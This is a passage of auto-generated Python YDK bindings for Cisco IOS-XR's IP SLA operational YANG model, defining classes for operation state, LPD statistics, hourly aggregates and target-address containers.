    # 'operation_id' is the YANG list key for this entry.
    self.ylist_key_names = ['operation_id']
    # Single-instance child containers, keyed by their YANG names.
    self._child_container_classes = OrderedDict([("common", ("common", Ipsla.OperationData.Operations.Operation.Common)), ("lpd", ("lpd", Ipsla.OperationData.Operations.Operation.Lpd)), ("history", ("history", Ipsla.OperationData.Operations.Operation.History)), ("statistics", ("statistics", Ipsla.OperationData.Operations.Operation.Statistics))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict([
        ('operation_id', YLeaf(YType.int32, 'operation-id')),
    ])
    self.operation_id = None
    # Instantiate and parent each child container.
    self.common = Ipsla.OperationData.Operations.Operation.Common()
    self.common.parent = self
    self._children_name_map["common"] = "common"
    self._children_yang_names.add("common")
    self.lpd = Ipsla.OperationData.Operations.Operation.Lpd()
    self.lpd.parent = self
    self._children_name_map["lpd"] = "lpd"
    self._children_yang_names.add("lpd")
    self.history = Ipsla.OperationData.Operations.Operation.History()
    self.history.parent = self
    self._children_name_map["history"] = "history"
    self._children_yang_names.add("history")
    self.statistics = Ipsla.OperationData.Operations.Operation.Statistics()
    self.statistics.parent = self
    self._children_name_map["statistics"] = "statistics"
    self._children_yang_names.add("statistics")
    # Path segment carries the key predicate, e.g. operation[operation-id='1'].
    self._segment_path = lambda: "operation" + "[operation-id='" + str(self.operation_id) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/operation-data/operations/%s" % self._segment_path()
def __setattr__(self, name, value):
    """Delegate attribute writes to the YDK base machinery for the key leaf."""
    self._perform_setattr(Ipsla.OperationData.Operations.Operation, ['operation_id'], name, value)
class Common(Entity):
    """
    Common data for all operation types
    .. attribute:: operational_state
    Operational state for an operation
    **type**\: :py:class:`OperationalState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Common.OperationalState>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Register the single 'operational-state' child container."""
        super(Ipsla.OperationData.Operations.Operation.Common, self).__init__()
        self.yang_name = "common"
        self.yang_parent_name = "operation"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("operational-state", ("operational_state", Ipsla.OperationData.Operations.Operation.Common.OperationalState))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()
        # Instantiate and parent the operational-state child container.
        self.operational_state = Ipsla.OperationData.Operations.Operation.Common.OperationalState()
        self.operational_state.parent = self
        self._children_name_map["operational_state"] = "operational-state"
        self._children_yang_names.add("operational-state")
        self._segment_path = lambda: "common"

    class OperationalState(Entity):
        """
        Operational state for an operation
        .. attribute:: modification_time
        Last modification time of the operation expressed in msec since 00\:00\:00 UTC, January 1, 1970
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: start_time
        Last start time of the operation expressedin msec since 00\:00\:00 UTC, January 1, 1970
        **type**\: int
        **range:** 0..18446744073709551615
        .. attribute:: attempt_count
        Number of data collection attempts
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: skipped_count
        Number of data collection cycles skipped
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: life_remaining
        Number of seconds left in current life
        **type**\: int
        **range:** 0..4294967295
        **units**\: second
        .. attribute:: frequency
        Number of configured frequency Default 60
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: recurring
        For recurring operation configured
        **type**\: bool
        .. attribute:: operational_state
        Operational state
        **type**\: :py:class:`IpslaOperStateEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaOperStateEnum>`
        .. attribute:: flags
        Internal flags
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: local_port
        Cached local port
        **type**\: int
        **range:** 0..65535
        .. attribute:: unexpected_packets
        Unexpected probe pkts punted from LPTS
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: unexpected_control_packets
        Unexpected control pkts puntedfrom LPTS
        **type**\: int
        **range:** 0..4294967295
        .. attribute:: operation_time
        Start time of current instance of the operation
        **type**\: int
        **range:** 0..18446744073709551615
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            """Register this leaf-only 'operational-state' container (timing/state/counter leafs)."""
            super(Ipsla.OperationData.Operations.Operation.Common.OperationalState, self).__init__()
            self.yang_name = "operational-state"
            self.yang_parent_name = "common"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])
            self._child_list_classes = OrderedDict([])
            # Leaf descriptors: python attribute name -> YLeaf(yang type, yang name).
            self._leafs = OrderedDict([
                ('modification_time', YLeaf(YType.uint64, 'modification-time')),
                ('start_time', YLeaf(YType.uint64, 'start-time')),
                ('attempt_count', YLeaf(YType.uint32, 'attempt-count')),
                ('skipped_count', YLeaf(YType.uint32, 'skipped-count')),
                ('life_remaining', YLeaf(YType.uint32, 'life-remaining')),
                ('frequency', YLeaf(YType.uint32, 'frequency')),
                ('recurring', YLeaf(YType.boolean, 'recurring')),
                ('operational_state', YLeaf(YType.enumeration, 'operational-state')),
                ('flags', YLeaf(YType.uint32, 'flags')),
                ('local_port', YLeaf(YType.uint16, 'local-port')),
                ('unexpected_packets', YLeaf(YType.uint32, 'unexpected-packets')),
                ('unexpected_control_packets', YLeaf(YType.uint32, 'unexpected-control-packets')),
                ('operation_time', YLeaf(YType.uint64, 'operation-time')),
            ])
            self.modification_time = None
            self.start_time = None
            self.attempt_count = None
            self.skipped_count = None
            self.life_remaining = None
            self.frequency = None
            self.recurring = None
            self.operational_state = None
            self.flags = None
            self.local_port = None
            self.unexpected_packets = None
            self.unexpected_control_packets = None
            self.operation_time = None
            self._segment_path = lambda: "operational-state"

        def __setattr__(self, name, value):
            """Delegate attribute writes to the YDK base machinery for the named leafs."""
            self._perform_setattr(Ipsla.OperationData.Operations.Operation.Common.OperationalState, ['modification_time', 'start_time', 'attempt_count', 'skipped_count', 'life_remaining', 'frequency', 'recurring', 'operational_state', 'flags', 'local_port', 'unexpected_packets', 'unexpected_control_packets', 'operation_time'], name, value)
class Lpd(Entity):
"""
LPD operational data of MPLS LSP group
operation
.. attribute:: statistics
Statistics collected for LPD group
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics>`
.. attribute:: status
Operational status of LPD group
**type**\: :py:class:`Status <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the LPD container with its 'statistics' and 'status' children."""
    super(Ipsla.OperationData.Operations.Operation.Lpd, self).__init__()

    # YANG schema bookkeeping consumed by the YDK runtime.
    self.yang_name = "lpd"
    self.yang_parent_name = "operation"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: YANG name -> (python attribute name, class).
    self._child_container_classes = OrderedDict([("statistics", ("statistics", Ipsla.OperationData.Operations.Operation.Lpd.Statistics)), ("status", ("status", Ipsla.OperationData.Operations.Operation.Lpd.Status))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()

    # Eagerly instantiate and register both child containers.
    self.statistics = Ipsla.OperationData.Operations.Operation.Lpd.Statistics()
    self.statistics.parent = self
    self._children_name_map["statistics"] = "statistics"
    self._children_yang_names.add("statistics")
    self.status = Ipsla.OperationData.Operations.Operation.Lpd.Status()
    self.status.parent = self
    self._children_name_map["status"] = "status"
    self._children_yang_names.add("status")
    self._segment_path = lambda: "lpd"
class Statistics(Entity):
    """
    Statistics collected for an LPD group.

    Attributes:
        latest (Latest): LPD statistics collected during the last
            sampling cycle.
        aggregated (Aggregated): statistics aggregated for the LPD group,
            collected over time intervals.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "statistics"
        self.yang_parent_name = "lpd"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers: YANG name -> (python attribute name, class).
        self._child_container_classes = OrderedDict([("latest", ("latest", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest)), ("aggregated", ("aggregated", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()

        # Eagerly instantiate and register both child containers.
        self.latest = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest()
        self.latest.parent = self
        self._children_name_map["latest"] = "latest"
        self._children_yang_names.add("latest")
        self.aggregated = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated()
        self.aggregated.parent = self
        self._children_name_map["aggregated"] = "aggregated"
        self._children_yang_names.add("aggregated")
        self._segment_path = lambda: "statistics"
class Latest(Entity):
    """
    LPD statistics collected during the last sampling cycle.

    Attributes:
        target (Target): latest statistics of the LPD group.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "latest"
        self.yang_parent_name = "statistics"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("target", ("target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()

        # Eagerly instantiate and register the single child container.
        self.target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target()
        self.target.parent = self
        self._children_name_map["target"] = "target"
        self._children_yang_names.add("target")
        self._segment_path = lambda: "latest"
class Target(Entity):
    """
    Latest statistics of an LPD group.

    Attributes:
        target_address (TargetAddress): the LPD target (child container).
        start_time (int, uint64): LPD start time, in msec since
            00:00:00 UTC, January 1, 1970.
        return_code (IpslaMplsLpdRetCode): LPD return code.
        completion_time_count (int, uint32): number of CompT samples.
        completion_time (int, uint32): LPD completion time.
        min_completion_time / max_completion_time / sum_completion_time
            (int, uint32): minimum, maximum and sum of CompT.
        path_count / min_path_count / max_path_count (int, uint32):
            current, minimum and maximum number of paths.
        ok_count (int, uint32): number of successes.
        no_path_count, all_paths_broken_count,
        all_paths_unexplorable_count,
        all_paths_broken_or_unexplorable_count, timeout_count,
        internal_error_count, unknown_count (int, uint32): failure
            counters, broken down by cause.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "target"
        self.yang_parent_name = "latest"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress))])
        self._child_list_classes = OrderedDict([])
        # Leaf registry: python attribute name -> (YANG type, YANG leaf name).
        # Insertion order is significant to the generated model; do not reorder.
        self._leafs = OrderedDict([
            ('start_time', YLeaf(YType.uint64, 'start-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('completion_time_count', YLeaf(YType.uint32, 'completion-time-count')),
            ('completion_time', YLeaf(YType.uint32, 'completion-time')),
            ('min_completion_time', YLeaf(YType.uint32, 'min-completion-time')),
            ('max_completion_time', YLeaf(YType.uint32, 'max-completion-time')),
            ('sum_completion_time', YLeaf(YType.uint32, 'sum-completion-time')),
            ('path_count', YLeaf(YType.uint32, 'path-count')),
            ('min_path_count', YLeaf(YType.uint32, 'min-path-count')),
            ('max_path_count', YLeaf(YType.uint32, 'max-path-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('no_path_count', YLeaf(YType.uint32, 'no-path-count')),
            ('all_paths_broken_count', YLeaf(YType.uint32, 'all-paths-broken-count')),
            ('all_paths_unexplorable_count', YLeaf(YType.uint32, 'all-paths-unexplorable-count')),
            ('all_paths_broken_or_unexplorable_count', YLeaf(YType.uint32, 'all-paths-broken-or-unexplorable-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('unknown_count', YLeaf(YType.uint32, 'unknown-count')),
        ])
        # Leaf values are unset until data is read from the device.
        self.start_time = None
        self.return_code = None
        self.completion_time_count = None
        self.completion_time = None
        self.min_completion_time = None
        self.max_completion_time = None
        self.sum_completion_time = None
        self.path_count = None
        self.min_path_count = None
        self.max_path_count = None
        self.ok_count = None
        self.no_path_count = None
        self.all_paths_broken_count = None
        self.all_paths_unexplorable_count = None
        self.all_paths_broken_or_unexplorable_count = None
        self.timeout_count = None
        self.internal_error_count = None
        self.unknown_count = None

        # Eagerly instantiate and register the target-address child container.
        self.target_address = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress()
        self.target_address.parent = self
        self._children_name_map["target_address"] = "target-address"
        self._children_yang_names.add("target-address")
        self._segment_path = lambda: "target"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery so that
        # leaf assignments are validated/tracked against the declared leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target, ['start_time', 'return_code', 'completion_time_count', 'completion_time', 'min_completion_time', 'max_completion_time', 'sum_completion_time', 'path_count', 'min_path_count', 'max_path_count', 'ok_count', 'no_path_count', 'all_paths_broken_count', 'all_paths_unexplorable_count', 'all_paths_broken_or_unexplorable_count', 'timeout_count', 'internal_error_count', 'unknown_count'], name, value)
class TargetAddress(Entity):
    """
    LPD target address (a choice of target representations).

    Attributes:
        ipv4_prefix_target (Ipv4PrefixTarget): IPv4 prefix target.
        tunnel_id_target (TunnelIdTarget): tunnel ID target.
        ipv4_pseudowire_target (Ipv4PseudowireTarget): IPv4 pseudowire target.
        target_type (IpslaTargetTypeEnum): discriminator selecting which
            target representation is in use.
        ipv4_address_target (str): IPv4 address target (dotted-quad pattern).
        ipv6_address_target (str): IPv6 address target (RFC-style textual
            IPv6 pattern).
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "target-address"
        self.yang_parent_name = "target"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers: YANG name -> (python attribute name, class).
        self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('target_type', YLeaf(YType.enumeration, 'target-type')),
            ('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
            ('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
        ])
        # Leaf values are unset until data is read from the device.
        self.target_type = None
        self.ipv4_address_target = None
        self.ipv6_address_target = None

        # Eagerly instantiate and register the three child containers.
        self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget()
        self.ipv4_prefix_target.parent = self
        self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
        self._children_yang_names.add("ipv4-prefix-target")
        self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget()
        self.tunnel_id_target.parent = self
        self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
        self._children_yang_names.add("tunnel-id-target")
        self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget()
        self.ipv4_pseudowire_target.parent = self
        self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
        self._children_yang_names.add("ipv4-pseudowire-target")
        self._segment_path = lambda: "target-address"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
    """
    IPv4 prefix target.

    Attributes:
        address (str): IPv4 address (dotted-quad pattern).
        mask_length (int, uint8): mask length, range 0..255.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "ipv4-prefix-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('address', YLeaf(YType.str, 'address')),
            ('mask_length', YLeaf(YType.uint8, 'mask-length')),
        ])
        # Leaf values are unset until data is read from the device.
        self.address = None
        self.mask_length = None
        self._segment_path = lambda: "ipv4-prefix-target"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
    """
    Tunnel ID target.

    Attributes:
        tunnel_id (int, uint32): tunnel ID, range 0..4294967295.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "tunnel-id-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
        ])
        # Leaf value is unset until data is read from the device.
        self.tunnel_id = None
        self._segment_path = lambda: "tunnel-id-target"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
    """
    IPv4 pseudowire target.

    Attributes:
        address (str): IPv4 address (dotted-quad pattern).
        virtual_circuit_id (int, uint32): virtual circuit ID,
            range 0..4294967295.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "ipv4-pseudowire-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('address', YLeaf(YType.str, 'address')),
            ('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
        ])
        # Leaf values are unset until data is read from the device.
        self.address = None
        self.virtual_circuit_id = None
        self._segment_path = lambda: "ipv4-pseudowire-target"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Aggregated(Entity):
    """
    Statistics aggregated for an LPD group, collected over time intervals.

    Attributes:
        hours (Hours): table of LPD statistics aggregated over
            1-hour intervals.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "aggregated"
        self.yang_parent_name = "statistics"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("hours", ("hours", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()

        # Eagerly instantiate and register the single child container.
        self.hours = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours()
        self.hours.parent = self
        self._children_name_map["hours"] = "hours"
        self._children_yang_names.add("hours")
        self._segment_path = lambda: "aggregated"
class Hours(Entity):
    """
    Table of LPD statistics aggregated over 1-hour intervals.

    Attributes:
        hour (YList of Hour): LPD statistics aggregated for a
            1-hour interval, one entry per hour index.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "hours"
        self.yang_parent_name = "aggregated"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        # Child list: YANG name -> (python attribute name, class).
        self._child_list_classes = OrderedDict([("hour", ("hour", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour))])
        self._leafs = OrderedDict()
        # List of Hour entries, managed by the YDK YList type.
        self.hour = YList(self)
        self._segment_path = lambda: "hours"

    def __setattr__(self, name, value):
        # No leafs on this node; the empty leaf-name list still routes
        # writes through the Entity machinery.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours, [], name, value)
class Hour(Entity):
    """
    LPD statistics aggregated for a 1-hour interval (list entry).

    Attributes:
        hour_index (int, int32, list key): hour index,
            range -2147483648..2147483647.
        target_address (TargetAddress): the LPD target (child container).
        start_time (int, uint64): LPD start time, in msec since
            00:00:00 UTC, January 1, 1970.
        return_code (IpslaMplsLpdRetCode): LPD return code.
        completion_time_count (int, uint32): number of CompT samples.
        completion_time (int, uint32): LPD completion time.
        min_completion_time / max_completion_time / sum_completion_time
            (int, uint32): minimum, maximum and sum of CompT.
        path_count / min_path_count / max_path_count (int, uint32):
            current, minimum and maximum number of paths.
        ok_count (int, uint32): number of successes.
        no_path_count, all_paths_broken_count,
        all_paths_unexplorable_count,
        all_paths_broken_or_unexplorable_count, timeout_count,
        internal_error_count, unknown_count (int, uint32): failure
            counters, broken down by cause.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "hour"
        self.yang_parent_name = "hours"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # hour_index is the list key; it appears in the segment path below.
        self.ylist_key_names = ['hour_index']
        self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress))])
        self._child_list_classes = OrderedDict([])
        # Leaf registry: python attribute name -> (YANG type, YANG leaf name).
        # Insertion order is significant to the generated model; do not reorder.
        self._leafs = OrderedDict([
            ('hour_index', YLeaf(YType.int32, 'hour-index')),
            ('start_time', YLeaf(YType.uint64, 'start-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('completion_time_count', YLeaf(YType.uint32, 'completion-time-count')),
            ('completion_time', YLeaf(YType.uint32, 'completion-time')),
            ('min_completion_time', YLeaf(YType.uint32, 'min-completion-time')),
            ('max_completion_time', YLeaf(YType.uint32, 'max-completion-time')),
            ('sum_completion_time', YLeaf(YType.uint32, 'sum-completion-time')),
            ('path_count', YLeaf(YType.uint32, 'path-count')),
            ('min_path_count', YLeaf(YType.uint32, 'min-path-count')),
            ('max_path_count', YLeaf(YType.uint32, 'max-path-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('no_path_count', YLeaf(YType.uint32, 'no-path-count')),
            ('all_paths_broken_count', YLeaf(YType.uint32, 'all-paths-broken-count')),
            ('all_paths_unexplorable_count', YLeaf(YType.uint32, 'all-paths-unexplorable-count')),
            ('all_paths_broken_or_unexplorable_count', YLeaf(YType.uint32, 'all-paths-broken-or-unexplorable-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('unknown_count', YLeaf(YType.uint32, 'unknown-count')),
        ])
        # Leaf values are unset until data is read from the device.
        self.hour_index = None
        self.start_time = None
        self.return_code = None
        self.completion_time_count = None
        self.completion_time = None
        self.min_completion_time = None
        self.max_completion_time = None
        self.sum_completion_time = None
        self.path_count = None
        self.min_path_count = None
        self.max_path_count = None
        self.ok_count = None
        self.no_path_count = None
        self.all_paths_broken_count = None
        self.all_paths_unexplorable_count = None
        self.all_paths_broken_or_unexplorable_count = None
        self.timeout_count = None
        self.internal_error_count = None
        self.unknown_count = None

        # Eagerly instantiate and register the target-address child container.
        self.target_address = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress()
        self.target_address.parent = self
        self._children_name_map["target_address"] = "target-address"
        self._children_yang_names.add("target-address")
        # The segment path embeds the current key value, so it is evaluated
        # lazily each time the path is built.
        self._segment_path = lambda: "hour" + "[hour-index='" + str(self.hour_index) + "']"

    def __setattr__(self, name, value):
        # Route all attribute writes through the Entity machinery so that
        # leaf assignments are validated/tracked against the declared leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour, ['hour_index', 'start_time', 'return_code', 'completion_time_count', 'completion_time', 'min_completion_time', 'max_completion_time', 'sum_completion_time', 'path_count', 'min_path_count', 'max_path_count', 'ok_count', 'no_path_count', 'all_paths_broken_count', 'all_paths_unexplorable_count', 'all_paths_broken_or_unexplorable_count', 'timeout_count', 'internal_error_count', 'unknown_count'], name, value)
class TargetAddress(Entity):
    """
    LPD target address (a choice of target representations).

    Attributes:
        ipv4_prefix_target (Ipv4PrefixTarget): IPv4 prefix target.
        tunnel_id_target (TunnelIdTarget): tunnel ID target.
        ipv4_pseudowire_target (Ipv4PseudowireTarget): IPv4 pseudowire target.
        target_type (IpslaTargetTypeEnum): discriminator selecting which
            target representation is in use.
        ipv4_address_target (str): IPv4 address target (dotted-quad pattern).
        ipv6_address_target (str): IPv6 address target (RFC-style textual
            IPv6 pattern).
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress, self).__init__()

        # YANG schema bookkeeping consumed by the YDK runtime.
        self.yang_name = "target-address"
        self.yang_parent_name = "hour"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers: YANG name -> (python attribute name, class).
        self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('target_type', YLeaf(YType.enumeration, 'target-type')),
            ('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
            ('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
        ])
        # Leaf values are unset until data is read from the device.
        self.target_type = None
        self.ipv4_address_target = None
        self.ipv6_address_target = None

        # Eagerly instantiate and register the three child containers.
        self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PrefixTarget()
        self.ipv4_prefix_target.parent = self
        self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
        self._children_yang_names.add("ipv4-prefix-target")
        self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.TunnelIdTarget()
        self.tunnel_id_target.parent = self
        self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
        self._children_yang_names.add("tunnel-id-target")
        self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated.Hours.Hour.TargetAddress.Ipv4PseudowireTarget()
        self.ipv4_pseudowire_target.parent = self
